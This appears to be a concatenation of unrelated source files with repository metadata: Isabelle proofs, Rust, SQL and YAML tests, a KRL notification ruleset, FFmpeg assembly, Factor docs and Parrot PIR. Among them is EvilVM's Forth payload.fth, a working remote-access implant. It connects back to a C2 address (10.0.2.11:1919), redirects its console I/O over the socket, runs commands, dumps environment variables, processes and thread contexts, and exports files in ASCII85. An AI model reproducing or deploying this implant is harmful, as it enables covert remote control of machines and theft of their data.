| StepSeq: "F \<Turnstile> (S, s\<^sub>1 ;; s\<^sub>2) \<rhd> Normal (S \<lparr> stack := (store S, s\<^sub>2, SeqFrame) # stack S \<rparr>, s\<^sub>1)"
| StepSkip: "stack S = (st', cont, SeqFrame) # stack' \<Longrightarrow> F \<Turnstile> (S, Skip) \<rhd> Normal (S \<lparr> store := st', stack := stack' \<rparr>, cont)"
| StepReturnSeq: "stack S = (st', cont, SeqFrame) # stack' \<Longrightarrow> F \<Turnstile> (S, Return e) \<rhd> Normal (S \<lparr> stack := stack' \<rparr>, Return e)"
| StepReturnFun: "\<lbrakk> stack S = (store', cont, ReturnFrame x) # stack'; store S \<Turnstile> e \<down> v \<rbrakk>
\<Longrightarrow> F \<Turnstile> (S, Return e) \<rhd> Normal (\<lparr> store = store'(x \<mapsto> v), heap = pop_heap (heap S), stack = stack' \<rparr>, cont)"
| StepCall: "\<lbrakk> F f = Some (Func as body); length as = length es; pre_vs = map (ExpV (store S)) es; \<forall>v \<in> set pre_vs. v \<noteq> None \<rbrakk>
\<Longrightarrow> F \<Turnstile> (S, Call x f es s) \<rhd> Normal (\<lparr> store = [as [\<mapsto>] map the pre_vs], heap = push_heap (heap S), stack = (store S, s, ReturnFrame x) # (stack S) \<rparr>, body)"
| StepReturnFin: "\<lbrakk> stack S = []; store S \<Turnstile> e \<down> v \<rbrakk> \<Longrightarrow> F \<Turnstile> (S, Return e) \<rhd> Finished v"
inductive_cases StepSkipE: "F \<Turnstile> (S, Skip) \<rhd> Normal (S', s')"
inductive_cases StepReturnE [consumes 1, case_names SeqFrame ReturnFrame Finish]: "F \<Turnstile> (S, Return e) \<rhd> R"
(* inductive_cases WfStackConsE': "WfStack \<Psi> \<Delta> ((s, cont, x)#st) \<tau>" *)
inductive_cases StepCallE: "F \<Turnstile> (S, Call x args body s) \<rhd> R"
inductive_cases StepSeqE: "F \<Turnstile> (S, s\<^sub>1 ;; s\<^sub>2) \<rhd> R"
inductive
StepN :: "('var, 'fun) funs \<Rightarrow> nat \<Rightarrow> ('var, 'fun) state \<times> ('var, 'fun) stmt \<Rightarrow> ('var, 'fun) StepResult \<Rightarrow> bool" ("_, _ \<Turnstile> _ \<rhd>\<^sup>* _" [49, 49, 49, 49] 50)
where
Step1: "F, 0 \<Turnstile> S \<rhd>\<^sup>* Normal S"
| StepN: "\<lbrakk> F, n \<Turnstile> S \<rhd>\<^sup>* Normal S'; F \<Turnstile> S' \<rhd> S'' \<rbrakk> \<Longrightarrow> F, Suc n \<Turnstile> S \<rhd>\<^sup>* S''"
lemma StepN_add_head:
assumes s1: "F \<Turnstile> S \<rhd> Normal S'"
and sn: "F, n \<Turnstile> S' \<rhd>\<^sup>* S''"
shows "F, Suc n \<Turnstile> S \<rhd>\<^sup>* S''"
using sn s1
by induction (auto intro: StepN.intros)
(*<*)
end
(*>*)
| Isabelle | 5 | cyy9447/ivory | ivory-formal-model/Semantics.thy | [
"BSD-3-Clause"
] |
// build-pass
// compile-flags: -Zsave-analysis
enum Enum2 {
Variant8 { _field: bool },
}
impl Enum2 {
fn new_variant8() -> Enum2 {
Self::Variant8 { _field: true }
}
}
fn main() {}
| Rust | 4 | Eric-Arellano/rust | src/test/ui/save-analysis/issue-73022.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
module C (module A, module M2) where
import A
import B as M2
| PureScript | 1 | metaleap/purs-with-dump-coreimp | examples/passing/ReExportQualified/C.purs | [
"BSD-3-Clause"
] |
mobilePhone = ()
| Self | 0 | LaudateCorpus1/RosettaCodeData | Task/Inheritance-Multiple/Self/inheritance-multiple-2.self | [
"Info-ZIP"
] |
-- Tags: distributed
DROP TABLE IF EXISTS test5346;
CREATE TABLE test5346 (`Id` String, `Timestamp` DateTime, `updated` DateTime)
ENGINE = ReplacingMergeTree(updated) PARTITION BY tuple() ORDER BY (Timestamp, Id);
INSERT INTO test5346 VALUES('1',toDateTime('2020-01-01 00:00:00'),toDateTime('2020-01-01 00:00:00'));
SELECT Id, Timestamp
FROM remote('localhost,127.0.0.1,127.0.0.2',currentDatabase(),'test5346') FINAL
ORDER BY Timestamp;
SELECT Id, Timestamp
FROM remote('localhost,127.0.0.1,127.0.0.2',currentDatabase(),'test5346') FINAL
ORDER BY identity(Timestamp);
DROP TABLE test5346;
| SQL | 3 | pdv-ru/ClickHouse | tests/queries/0_stateless/01517_select_final_distributed.sql | [
"Apache-2.0"
] |
kind: pipeline
type: docker
name: defaults
steps:
- name: {{ upper .input.stepName }}
image: {{ .input.image }}
commands:
- {{ .input.commands }} | YAML | 2 | sthagen/drone-drone | plugin/converter/testdata/yaml.input.yml | [
"Apache-2.0"
] |
{block title}New pad{/block}
{block page_title}<span>New pad</span>{/block}
{block body}
{control createPad-form}
| Latte | 1 | aleanza/notejam | nette/doctrine/notejam/app/Presenters/templates/Pad/create.latte | [
"MIT"
] |
ruleset io.picolabs.notifications {
meta {
use module io.picolabs.manifold_pico alias manifold_pico
use module io.picolabs.wrangler alias wrangler
use module io.picolabs.subscription alias subscription
shares __testing, getNotifications, getBadgeNumber, getState, getID, getSettings
}
global {
__testing = { "queries":
[ { "name": "__testing" }
, { "name": "getNotifications" }
, { "name": "getBadgeNumber" }
, { "name" : "getState", "args": ["id"] }
, { "name" : "getID", "args": ["id"]}
//, { "name": "entry", "args": [ "key" ] }
] , "events":
[
{ "domain": "manifold", "type": "add_notification", "attrs": ["picoId", "thing", "app", "message", "ruleset"]}
, { "domain": "manifold", "type": "remove_notification", "attrs": ["notificationID"]}
, { "domain": "manifold", "type": "update_app_list", "attrs": []}
, { "domain": "manifold", "type": "set_notification_settings", "attrs": ["id"]}
, { "domain": "manifold", "type": "change_notification_setting", "attrs": ["id", "app_name", "option"]}
//{ "domain": "d1", "type": "t1" }
//, { "domain": "d2", "type": "t2", "attrs": [ "a1", "a2" ] }
]
}
getNotifications = function () {
ent:notifications.defaultsTo([]).reverse();
}
getBadgeNumber = function () {
ent:notifications.length()
}
getState = function (id) {
ent:notification_state{id};
}
updateAppList = function (id, apps) {
appList = ent:app_list;
(appList == null) => {}.put(id, apps) | (appList{id} == null) => appList.put(id, apps) | appList.set([id], apps);
}
getID = function(id) {
picoID = manifold_pico:getThings().filter(function(x) {
x{"subID"} == id
});
picoID.values()[0]{"picoID"};
}
setNotificationSettings = function(id, app_name) {
notification_settings = ent:notification_settings;
(notification_settings == null).klog("notification_settings == null") => {}.put(id, {}.put(app_name, {"Manifold": true, "Twilio": false, "Prowl": false, "Email": false, "Text": false})) |
(notification_settings{id} == null) => notification_settings.put(id, {}.put(app_name, {"Manifold": true, "Twilio": false, "Prowl": false, "Email": false, "Text": false})) |
(notification_settings{id}{app_name} == null) => notification_settings.put([id, app_name], {"Manifold": true, "Twilio": false, "Prowl": false, "Email": false, "Text": false}) |
ent:notification_settings
}
getSettings = function(id, app_name) {
ent:notification_settings{id}{app_name}
}
}
rule updateManifoldAppList {
select when manifold update_app_list or manifold update_version or manifold notify_manifold
foreach subscription:established().filter(function(x){
x{"Tx_role"} == "manifold_thing"
}) setting (x,i)
pre {
eci = x{"Tx"}
id = getID(x{"Id"})
apps = http:get(<<#{meta:host.klog("host")}/sky/event/#{eci}/apps/manifold/apps>>, parseJSON=true)["content"]["directives"];
}
always {
ent:app_list := updateAppList(id, apps);
raise manifold event "set_notification_settings"
attributes {"id": id}
}
}
rule setDefaultNotificationSettings {
select when manifold set_notification_settings
foreach ent:app_list{event:attr("id")} setting(x)
pre {
id = event:attr("id");
app_name = x{"options"}{"rid"}.klog("app_name")
}
always {
ent:notification_settings := setNotificationSettings(id, app_name).klog("ent:notification_settings");
raise twilio event "set_default_toPhone"
attributes {"id": id, "rs": app_name};
raise email event "set_default_recipient"
attributes {"id": id, "rs": app_name};
raise text_messenger event "set_default_toPhone"
attributes {"id": id, "rs": app_name};
}
}
rule changeNotificationSetting {
select when manifold change_notification_setting
pre {
id = event:attr("id");
app_name = event:attr("app_name");
option = event:attr("option");
}
if ent:notification_settings{id}.klog("{id}"){app_name}.klog("{app_name}"){option}.klog("{option}") == true then noop()
fired {
ent:notification_settings := ent:notification_settings.set([id, app_name, option], false);
}
else {
ent:notification_settings := ent:notification_settings.set([id, app_name, option], true);
}
}
rule addNotification {
select when manifold add_notification
pre {
thing = event:attr("thing");
picoId = event:attr("picoId");
app = event:attr("app");
message = event:attr("message");
rs = event:attr("ruleset");
state = event:attr("state").defaultsTo({});
notificationID = random:uuid();
time_stamp = time:now();
notification = event:attrs.put("id", notificationID).put("time", time_stamp);
}
if(thing && picoId && app && message && rs) then noop();
fired {
ent:notifications := ent:notifications.defaultsTo([]).append(notification)
if (ent:notification_settings{picoId}{rs}{"Manifold"}) == true;
ent:notification_state := ent:notification_state.defaultsTo({}).put(notificationID, state)
if (ent:notification_settings{picoId}{rs}{"Manifold"}) == true;
raise twilio event "notify_through_twilio"
attributes {"Body": message, "rs": rs, "id": picoId }
if (ent:notification_settings{picoId}{rs}{"Twilio"}) == true;
raise prowl event "notify_through_prowl"
attributes {"Body": message, "rs": rs, "id": picoId, "application": app }
if (ent:notification_settings{picoId}{rs}{"Prowl"}) == true;
raise email event "notification"
attributes {"Body": message, "rs": rs, "id": picoId, "application": app, "thing": thing }
if(ent:notification_settings{picoId}{rs}{"Email"}) == true;
raise text_messenger event "text_notification"
attributes {"Body": message, "rs": rs, "id": picoId, "application": app, "thing": thing }
if(ent:notification_settings{picoId}{rs}{"Text"}) == true
}
}
rule removeNotification {
select when manifold remove_notification
pre {
id = event:attr("notificationID")
}
if id then noop();
fired {
ent:notifications := ent:notifications.defaultsTo([]).filter(function(x) {
(x["id"] != id)
});
}
}
}
| KRL | 4 | Picolab/ManifoldRewrite | Manifold_krl/io.picolabs.notifications.krl | [
"MIT"
] |
0 !echo
\ ------------------------------------------------------------------------
\ Gaps in the core API
\ ------------------------------------------------------------------------
\ Pretty-print the output
kernel32 0 dllfun GetLastError GetLastError
kernel32 1 dllfun CloseHandle CloseHandle
: .err red ." Error! " GetLastError . clear cr ;
: .pre ." \n\x1b[35m---- BEGIN OUTPUT ----\n\x1b[35;1m" ;
: .post ." \x1b[0m\x1b[35m----- END OUTPUT -----\n\x1b[0m" prompt ;
: .cstring dup c@ dup if emit 1+ tail then 2drop ;
variable bytes
\ ------------------------------------------------------------------------
\ Strings in regions of memory
\ ------------------------------------------------------------------------
private
variable binary
variable start
variable len
\ initialize string finding engine
: init binary on start off len off ;
\ test if a byte is a printable character
: print? 32 126 within ;
\ print strings when found if they're long enough
: .addr start @ hex 16 cyan .r magenta dec ;
: .str start @ len @ type cr ;
: .str? len @ 4 >= if .addr .str then ;
\ track strings in memory
: track start ! binary off 1 len ! ;
: >plain binary @ if track else drop len incr then ;
: >bin binary @ 0= if binary on .str? then ;
public{
\ print ASCII strings in a region of memory
: strings ( address length -- )
init .pre bounds do
i c@ print? if i >plain else >bin then
loop
.post
;
}public
\ ------------------------------------------------------------------------
\ Executing commands
\ ------------------------------------------------------------------------
\ This examples imports some Win32 functions and provides a simple interface
\ for executing processes and collecting their output.
\ DLL ARGS GPA WORD EXPORT NAME
kernel32 10 dllfun CreateProcess CreateProcessA
kernel32 4 dllfun CreatePipe CreatePipe
kernel32 5 dllfun ReadFile ReadFile
private
\ STARTUP_INFO struct that defines parameters for CreateProcess
create sinfo 104 allot 104 sinfo d!
: dwFlags sinfo 60 + ;
: wShowWindow sinfo 64 + ;
: hStdOutput sinfo 88 + ;
: hStdError sinfo 96 + ;
\ PROCESS_INFO, filled out by CreateProcess in case we need it
create pinfo 24 allot
: hProcess pinfo ;
: hThread pinfo 8 + ;
\ This is a small record for storing handles for a FIFO
create I/O 0 , 0 , 24 , 0 , 1 , ( inherit )
: <pipe @ ;
: >pipe 8 + @ ;
variable running
\ To be good citizens, we close the handles. Even if the child process has
\ closed them, they can be "re-closed" safely, so we close everything in a
\ heavy-handed fashion.
: clean
I/O >pipe CloseHandle drop
I/O <pipe CloseHandle drop
hProcess CloseHandle drop
hThread CloseHandle drop ;
\ We might run more than one command in a session, so this will initialize
\ the sinfo struct and create a pipe for a new CreateProcess execution.
\ For safety, it has seemed like a good idea to zero out the sinfo between
\ runs.
: plumb
sinfo 4 + 100 zero
257 dwFlags d!
0 wShowWindow d!
I/O dup 8 + dup 8 + 0 CreatePipe drop
I/O >pipe hStdOutput !
I/O >pipe hStdError ! ;
\ The key to good coordination with the child process is to close the "write"
\ side of the pipe from the parent process. This way, when the child exits
\ it will close its reference to the HANDLE and our attempts to ReadFile from
\ this side will fail.
: /out I/O >pipe CloseHandle drop ;
\ This just wraps up the call to CreateProcess to keep things pretty.
\ Consumes a counted string as input representing the process to execute.
: exec drop 0 swap 0 0 1 0 0 0 sinfo pinfo CreateProcess /out ;
\ Read to the end of the Pipe's lifetime. For an infinite running process,
\ this could prevent returning control to the interpreter, so be careful!
: read I/O <pipe here 512 bytes 0 ReadFile ;
: slurp read if here bytes @ type tail then ;
\ Provide a friendly interface. Will read the line after it's called in the
\ outer interpreter to get the string for CreateProcess. This lets you do
\ pipelines or other complex calls without worrying about string escapes.
public{
: cmd plumb exec if running on .pre slurp .post else .err then clean ;
: !! readline cmd ;
: spawn s" main.exe" plumb exec I/O dup <pipe swap >pipe ;
}public
\ ------------------------------------------------------------------------
\ View environment variables
\ ------------------------------------------------------------------------
private
kernel32 0 dllfun GetEnvironmentStrings GetEnvironmentStrings
kernel32 3 dllfun GetEnvironmentVariable GetEnvironmentVariableA
variable z?
variable done?
: (walk) dup c@ >r 1+ r> ;
: handle0 drop z? @ if done? on else z? on cr then ;
: handle if z? off emit else handle0 then ;
: output done? @ if drop else (walk) dup handle tail then ;
public{
: .ctable done? off z? off .pre output .post ;
: getenv* GetEnvironmentStrings dup if .ctable then ;
: getenv readline drop here 1024 GetEnvironmentVariable if .pre here .cstring cr .post then ;
}public
\ ------------------------------------------------------------------------
\ Interact with filesystem and other environment aspects
\ ------------------------------------------------------------------------
private
kernel32 2 dllfun GCD GetCurrentDirectoryA
kernel32 0 dllfun GetCurrentProcessId GetCurrentProcessId
kernel32 2 dllfun GetLogicalDriveStrings GetLogicalDriveStringsA
kernel32 2 dllfun FindFirstVolume FindFirstVolumeA
kernel32 3 dllfun FindNextVolume FindNextVolumeA
: >vol here 1024 FindNextVolume ;
: lsvol here .cstring cr dup >vol if tail then CloseHandle drop ;
: lsvol here 1024 FindFirstVolume lsvol ;
public{
: pwd here 1024 over GCD .pre type cr .post ;
: pid GetCurrentProcessId ;
: lsvol .pre lsvol .post ;
: lsdrives 1024 here GetLogicalDriveStrings if here .ctable else .err then ;
}public
\ ------------------------------------------------------------------------
\ Listing directory contents
\ ------------------------------------------------------------------------
private
create WIN32_FIND_DATA 8 cells 256 + 14 + allot
variable HANDLE
kernel32 2 dllfun FindFirstFile FindFirstFileA
kernel32 2 dllfun FindNextFile FindNextFileA
kernel32 1 dllfun FindClose FindClose
: find-first drop WIN32_FIND_DATA FindFirstFile dup HANDLE ! ;
: find-next HANDLE @ WIN32_FIND_DATA FindNextFile ;
: .file ( ugly, as formatting strings always is... )
blue WIN32_FIND_DATA dup
20 + SYSTEMTIME FileTimeToSystemTime drop SYSTEMTIME .time dup
28 + dup d@ 32 << swap 4 + d@ + 16 .>r space dup
d@ 16 and if magenta else cyan then dup
44 + .cstring dup
d@ 16 and if clear ." /" then
cr drop
;
: ls ( handle -- )
find-next if
.file tail
then ;
public{
: ls ( <line> -- )
readline find-first 0 > if
.pre .file ls .post
HANDLE @ FindClose drop
else
.err
then ;
}public
kernel32 2 dllfun GetComputerName GetComputerNameA
: hostname
1024 bytes ! here bytes GetComputerName
if .pre here .cstring cr .post else .err then ;
\ ------------------------------------------------------------------------
\ Load a file into memory
\ ------------------------------------------------------------------------
private
kernel32 2 dllfun GetFileSize GetFileSize
kernel32 7 dllfun CreateFile CreateFileA
kernel32 5 dllfun ReadFile ReadFile
hex
: loadfile
drop 80000000 7 0 3 0 0 CreateFile
dup here dup >r GetFileSize r> d@ 40 << + ( HANDLE size )
over >r dup >r dup allocate dup >r ( HANDLE size addr r:HANDLE size addr )
swap here 0 ReadFile drop ( r: HANDLE size addr )
r> r> r> ( addr size HANDLE )
CloseHandle drop ( addr size )
;
dec
public
private
\ an ASCII85 encoder so we can view binary files
variable a85acc
: shift 256 a85acc *! ; \ we add a byte at a time
: output a85acc @ 256 / ; \ take off last byte
: convert 4 0 do 85 /mod loop ; \ turn u32 into base-85 nums
: encode 5 0 do 33 + emit loop ; \ print values in A85 char space
: next dup if walk else 0 then ; \ grab next byte (0 after EOS)
\ extract a 4-byte chunk as 32-bit int
: chunk a85acc off 4 0 do next a85acc +! shift loop output ;
: fileop >r readline loadfile 2dup .pre r> execute .post drop free ;
public{
\ encode all chunks in string
: ascii85 dup if chunk dup if convert encode else drop [char] z emit then tail then 2drop cr ;
: cat ['] type fileop ;
: download ['] ascii85 fileop ;
}public
\ ------------------------------------------------------------------------
\ An interface for listing processes and current status of threads
\ ------------------------------------------------------------------------
private
kernel32 2 dllfun CreateToolhelp32Snapshot CreateToolhelp32Snapshot
kernel32 2 dllfun Process32First Process32First
kernel32 2 dllfun Process32Next Process32Next
kernel32 2 dllfun Thread32First Thread32First
kernel32 2 dllfun Thread32Next Thread32Next
kernel32 3 dllfun OpenProcess OpenProcess
kernel32 3 dllfun OpenThread OpenThread
kernel32 1 dllfun SuspendThread SuspendThread
kernel32 1 dllfun ResumeThread ResumeThread
kernel32 2 dllfun GetThreadContext GetThreadContext
hex
: PROCESS_ALL_ACCESS 1f0fff ;
: THREAD_ALL_ACCESS 1f03ff ;
: TH32CS_INHERIT 80000000 ;
: TH32CS_SNAPALL 0 ;
: TH32CS_SNAPHEAPLIST 1 ;
: TH32CS_SNAPMODULE 8 ;
: TH32CS_SNAPMODULE32 10 ;
: TH32CS_SNAPPROCESS 2 ;
: TH32CS_SNAPTHREAD 4 ;
dec
create TOOLMEM 304 allot
: set-snapprocess TOOLMEM 304 over ! dup 8 + 296 zero ;
: set-snapthreads TOOLMEM 28 over ! dup 8 + 20 zero ;
variable TOOLXT
variable TOOLHD
variable TOOLset
variable TOOL1st
variable TOOLnxt
: *tool32
TOOLMEM TOOLXT @ execute
TOOLHD @ TOOLset @ execute TOOLnxt @ execute
if tail then ;
: *tool32
TOOLXT !
TOOLHD @ TOOLset @ execute TOOL1st @ execute if
*tool32
TOOLHD @ CloseHandle drop
else
.err
then ;
: *tool32 ( eachxt nextxt firstxt setupxt snap )
0 CreateToolhelp32Snapshot TOOLHD !
TOOLset !
TOOL1st !
TOOLnxt !
*tool32 ;
: *threads ( xt )
['] Thread32Next
['] Thread32First
['] set-snapthreads
TH32CS_SNAPTHREAD
*tool32 ;
: *processes ( xt )
['] Process32Next
['] Process32First
['] set-snapprocess
TH32CS_SNAPPROCESS
*tool32 ;
variable PID
create CONTEXT align here 1232 allot does> drop [ rot litq ] ;
hex
: CONTEXT_CONTROL 1 ;
: CONTEXT_INTEGER 2 ;
: CONTEXT_ALL 10001f ;
dec
: >CONTEXT
CONTEXT dup 1232 zero
CONTEXT_ALL CONTEXT 48 + d! ;
: nq dup 8 + swap @ 18 .r space ;
: .context
hex 112 +
." Rax: " nq ." Rcx: " nq ." Rdx: " nq ." Rbx: " nq cr
." Rsp: " nq ." Rbp: " nq ." Rsi: " nq ." Rdi: " nq cr
." R8: " nq ." R9: " nq ." R10: " nq ." R11: " nq cr
." R12: " nq ." R13: " nq ." R14: " nq ." R15: " nq cr
." Rip: " nq cr
dec drop ;
: @thread ( tid )
THREAD_ALL_ACCESS 0 rot OpenThread dup if
dup SuspendThread 0 >= if
dup >CONTEXT GetThreadContext if
CONTEXT .context
else
.err
then
dup ResumeThread 4000000000 > if
.err ." Resume fail\n"
then
else
.err
then
CloseHandle drop
else
.err
then ;
: .threads*
dup 12 + d@ PID @ = if
cyan ." Thread: "
8 + d@ dup . cr magenta
@thread cr
else drop then ;
: .ps
dup 8 + d@ ." PID: " 8 cyan .r magenta
dup 28 + d@ ." Threads: " 8 cyan .r magenta
dup 32 + d@ ." PPID: " 8 cyan .r magenta
44 + ." Image: " green .cstring magenta cr ;
public{
: .threads .pre PID ! ['] .threads* *threads .post ;
: ps .pre ['] .ps *processes .post ;
}public
\ ------------------------------------------------------------------------
\ Miscellaneous functions that prove useful sometimes
\ ------------------------------------------------------------------------
private
: dictmap dup if hex dup . dec yellow dup >name type clear cr @ tail then ;
: dictmap last dictmap ;
public
\ ------------------------------------------------------------------------
\ Phone home to C2 server with new outer interpreter
\ ------------------------------------------------------------------------
: help
yellow
cr cr
." !! <cmd> Execute command (CreateProcess)\n"
." getenv <name> Get value of indicated environment variable\n"
." getenv* Show values of all environment variables\n"
." pwd Print working directory\n"
." pid Get current process ID\n"
." lsvol List system volumes\n"
." lsdrives List logical drives\n"
." ls <glob> List matching filesystem contents\n"
." hostname Show hostname\n"
." cat <path> Show contents of file\n"
." download <path> Show file contents in ASCII85 encoding\n"
." help Show this help listing\n"
." ps List running processes\n"
." <pid> .threads Show current context for threads in process\n"
cr
clear ;
private
kernel32 1 dllfun ExitProcess ExitProcess
: bye ." \x1b[35;1mFarewell...\x1b[0m" 0 ExitProcess ;
public
: key? 0 0 2drop ;
private
create buffer 8 allot
create WSAInfo 512 allot
variable winsock
variable sock
create ADDR
2 c, 0 c, \ AF_INET
7 c, 127 c, \ port 1919
10 c, 0 c, 2 c, 11 c, \ IP address 10.0.2.11
0 , \ padding
kernel32 1 dllfun LoadLibrary LoadLibraryA
{ s" ws2_32.dll" }! drop LoadLibrary winsock !
winsock @ 2 dllfun WSAStartup WSAStartup
winsock @ 3 dllfun socket socket
winsock @ 3 dllfun connect connect
winsock @ 4 dllfun send send
winsock @ 4 dllfun recv recv
winsock @ 1 dllfun closesocket closesocket
winsock @ 3 dllfun ioctlsocket ioctlsocket
: sockkey sock @ buffer 1 0 recv drop buffer c@ dup 10 = if prompt then ;
: sockemit buffer c! sock @ buffer 1 0 send drop ;
: socktype sock @ -rot 0 send drop ;
: sockkey? sock @ 1074030207 bytes ioctlsocket drop bytes @ ;
hex
: replace ( xt name len )
lookup >xt ( xt addr )
e8 over c! 1+ ( xt addr )
swap over ( addr xt addr )
- 4 - ( addr delta )
over d! ( addr )
4 + c3 swap c! ( )
;
dec
: wsver [ hex 0202 dec lit ] ;
: AF_INET 2 ;
: SOCK_STREAM 1 ;
: IPPROTO_TCP 6 ;
: init wsver WSAInfo WSAStartup drop ;
: plumb AF_INET SOCK_STREAM IPPROTO_TCP socket sock ! ;
: attach sock @ ADDR 16 connect drop ;
: terminate sock @ closesocket ;
: outer word dup if parse else 2drop then tail ;
: main
init plumb attach
['] sockkey s" key" replace
['] socktype s" type" replace
['] sockemit s" emit" replace
['] sockkey? s" key?" replace
['] outer !boot
cls
banner
." \x1b[35;1mHappy hacking...\x1b[0m\n"
0 !echo
prompt
outer
;
public
main
| Forth | 5 | jephthai/EvilVM | samples/payload.fth | [
"MIT"
] |
com.baeldung.url=www.abc.test.com
com.baeldung.jdbc.url=
com.baeldung.timeout-in-milli-seconds=2000
| INI | 1 | DBatOWL/tutorials | spring-boot-modules/spring-boot-properties-3/src/test/resources/configuration-processor.properties | [
"MIT"
] |
;*****************************************************************************
;* x86-optimized Float DSP functions
;*
;* Copyright 2016 James Almer
;*
;* This file is part of FFmpeg.
;*
;* FFmpeg is free software; you can redistribute it and/or
;* modify it under the terms of the GNU Lesser General Public
;* License as published by the Free Software Foundation; either
;* version 2.1 of the License, or (at your option) any later version.
;*
;* FFmpeg is distributed in the hope that it will be useful,
;* but WITHOUT ANY WARRANTY; without even the implied warranty of
;* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
;* Lesser General Public License for more details.
;*
;* You should have received a copy of the GNU Lesser General Public
;* License along with FFmpeg; if not, write to the Free Software
;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
;******************************************************************************
%include "x86util.asm"
SECTION .text
;-----------------------------------------------------------------------------
; void ff_butterflies_fixed(float *src0, float *src1, int len);
;-----------------------------------------------------------------------------
INIT_XMM sse2
cglobal butterflies_fixed, 3,3,3, src0, src1, len
shl lend, 2
add src0q, lenq
add src1q, lenq
neg lenq
align 16
.loop:
mova m0, [src0q + lenq]
mova m1, [src1q + lenq]
mova m2, m0
paddd m0, m1
psubd m2, m1
mova [src0q + lenq], m0
mova [src1q + lenq], m2
add lenq, mmsize
jl .loop
RET
| Assembly | 3 | attenuation/srs | trunk/3rdparty/ffmpeg-4-fit/libavutil/x86/fixed_dsp.asm | [
"MIT"
] |
! Copyright (C) 2008 Doug Coleman.
! See http://factorcode.org/license.txt for BSD license.xo
USING: arrays calendar help.markup help.syntax kernel math strings ;
IN: calendar.english
HELP: month-names
{ $values { "value" object } }
{ $description "Returns an array with the English names of all the months." }
{ $warning "Do not use this array for looking up a month name directly. Use " { $link month-name } " instead." } ;
HELP: month-name
{ $values { "obj" { $or integer timestamp } } { "string" string } }
{ $description "Looks up the month name and returns it as a string. January has an index of 1 instead of zero." } ;
HELP: month-abbreviations
{ $values { "value" array } }
{ $description "Returns an array with the English abbreviated names of all the months." }
{ $warning "Do not use this array for looking up a month name directly. Use " { $link month-abbreviation } " instead." } ;
HELP: month-abbreviation
{ $values { "n" integer } { "string" string } }
{ $description "Looks up the abbreviated month name and returns it as a string. January has an index of 1 instead of zero." } ;
HELP: day-names
{ $values { "value" array } }
{ $description "Returns an array with the English names of the days of the week." } ;
HELP: day-name
{ $values { "obj" { $or integer timestamp } } { "string" string } }
{ $description "Looks up the day name and returns it as a string." } ;
HELP: day-abbreviations2
{ $values { "value" array } }
{ $description "Returns an array with the abbreviated English names of the days of the week. This abbreviation is two characters long." } ;
HELP: day-abbreviation2
{ $values { "n" integer } { "string" string } }
{ $description "Looks up the abbreviated day name and returns it as a string. This abbreviation is two characters long." } ;
HELP: day-abbreviations3
{ $values { "value" array } }
{ $description "Returns an array with the abbreviated English names of the days of the week. This abbreviation is three characters long." } ;
HELP: day-abbreviation3
{ $values { "n" integer } { "string" string } }
{ $description "Looks up the abbreviated day name and returns it as a string. This abbreviation is three characters long." } ;
{
day-name day-names
day-abbreviation2 day-abbreviations2
day-abbreviation3 day-abbreviations3
} related-words
ARTICLE: "months" "Month names in English"
"Naming months:"
{ $subsections
month-name
month-names
month-abbreviation
month-abbreviations
} ;
ARTICLE: "days" "Day names in English"
"Naming days:"
{ $subsections
day-abbreviation2
day-abbreviations2
day-abbreviation3
day-abbreviations3
day-name
day-names
} ;
| Factor | 5 | alex-ilin/factor | basis/calendar/english/english-docs.factor | [
"BSD-2-Clause"
] |
=head1 TITLE
Data::Dumper::Base - style baseclass
=head1 VERSION
version 0.20
=head1 SYNOPSIS
TDB
=head1 DESCRIPTION
This is a baseclass that provides some essential functions necessary
for dumping data structures. It is subclassed by C<Data::Dumper::Default>,
which implements the methods that are finally doing the output.
=head1 METHODS
A Data::Dumper::Base object has the following methods:
=over 4
=cut
.sub __library_data_dumper_base_onload :load
.local pmc ddb_class
ddb_class = get_class ['Data'; 'Dumper'; 'Base']
if null ddb_class goto create_ddb
goto END
create_ddb:
newclass $P0, ['Data'; 'Dumper'; 'Base']
addattribute $P0, "dumper"
addattribute $P0, "level"
addattribute $P0, "indention"
addattribute $P0, "cache"
addattribute $P0, "cachename"
END:
.return ()
.end
.namespace ['Data'; 'Dumper'; 'Base']
=item style."prepare"( dumper, indent )
=cut
.sub prepare :method
.param pmc dumper
.param string indent
.local string stemp
.local pmc temp
setattribute self, "dumper", dumper
new temp, "Integer"
set temp, 0
setattribute self, "level", temp
new temp, "String"
clone stemp, indent
set temp, stemp
setattribute self, "indention", temp
new temp, "AddrRegistry"
setattribute self, "cache", temp
new temp, "ResizableStringArray"
setattribute self, "cachename", temp
.return ()
.end
=item (pos, name) = style."cache"( find, defname ) B<(internal)>
=cut
.sub cache :method
.param string name
.param pmc find
.local pmc _cache
.local int i
.local pmc _names
getattribute _cache, self, "cache"
getattribute _names, self, "cachename"
i = _cache[find]
if i == 0 goto NOTFOUND
# found entry => get its name
name = _names[i]
.return ( i, name )
NOTFOUND:
i = elements _cache
inc i
_cache[find] = i
_names[i] = name
.return ( -1, name )
.end
=item indent = style."createIndent"() B<(internal)>
=cut
.sub createIndent :method
.param int level
.local pmc temp
.local string indent
getattribute temp, self, "indention"
set indent, temp
clone indent, indent
repeat indent, indent, level
.return ( indent )
.end
=item indent = style."indent"()
=cut
.sub indent :method
.local pmc temp
.local string _indent
.local int level
getattribute temp, self, "level"
set level, temp
_indent = self."createIndent"( level )
.return ( _indent )
.end
=item (subindent,indent) = style."newIndent"()
=cut
.sub newIndent :method
.local pmc temp
.local string indent1
.local string indent2
.local int level
getattribute temp, self, "level"
set level, temp
inc temp
indent1 = self."createIndent"( level )
inc level
indent2 = self."createIndent"( level )
.return ( indent2, indent1 )
.end
=item indent = style."deleteIndent"()
=cut
.sub deleteIndent :method
.local pmc temp
.local string indent
.local int level
getattribute temp, self, "level"
dec temp
set level, temp
indent = self."createIndent"( level )
.return ( indent )
.end
=item style."dump"( name, dump )
=cut
.sub dump :method
.param string paramName
.param pmc _dump
.local int type
.local int ret
.local string temp
.local string func
.local string name
# Don't cache undef...
$I0 = defined _dump
unless $I0 goto NOT_IN_CACHE
(type, name) = self."cache"( paramName, _dump )
if type == -1 goto NOT_IN_CACHE
# name found in cache:
self."dumpCached"( name, _dump )
branch END
NOT_IN_CACHE:
# is _dump null?
# lookup the type id otherwise
set func, "pmcNull"
if_null _dump, DUMP
# does a specific helper method exist?
# (in general, it will not, let it override the general ones below)
typeof temp, _dump
set func, "pmc"
func = concat func, temp
can ret, self, func
